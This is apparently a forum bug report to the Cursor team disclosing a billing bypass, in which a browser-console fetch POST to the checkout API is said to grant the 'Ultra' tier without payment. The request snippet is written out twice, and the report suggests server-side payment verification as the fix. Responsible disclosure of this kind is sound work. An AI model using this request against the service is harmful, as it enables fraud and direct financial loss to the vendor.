Where does the bug appear (feature/product)?
Somewhere else…
Describe the Bug
Hello Cursor Team,
I am writing to report a critical billing bypass vulnerability I have discovered regarding the subscription upgrade process.
It appears that users can bypass the payment gateway entirely and upgrade to the “Ultra” tier for free by directly sending a specific POST request to your checkout API. This issue seems to be particularly exploited by users utilizing Alipay in the Chinese region.
Vulnerability Details:
Users can open the developer console on the dashboard and execute the following JavaScript code to instantly trigger the bug without any actual payment being processed:
JavaScript
fetch(‘https://cursor.com/api/checkout’, {
method: ‘POST’,
headers: {
‘Content-Type’: ‘application/json’
},
body: JSON.stringify({
tier: ‘ultra’,
allowAutomaticPayment: true,
yearly: false
})
});
Impact:
This method is currently being heavily abused to gain unauthorized access to premium features, leading to direct financial loss for your company.
Suggested Mitigation:
Please implement strict server-side validation to ensure that a successful payment callback from the payment provider (e.g., Alipay, Stripe) has been received and verified before provisioning the “Ultra” tier to any user account.
I highly recommend investigating this endpoint and patching it as soon as possible.
Best regards,
Steps to Reproduce
fetch(‘https://cursor.com/api/checkout’, {
method: ‘POST’,
headers: {
‘Content-Type’: ‘application/json’
},
body: JSON.stringify({
tier: ‘ultra’,
allowAutomaticPayment: true,
yearly: false
})
});
Operating System
Windows 10/11
Version Information
Kind people
Does this stop you from using Cursor
No - Cursor works, but with this issue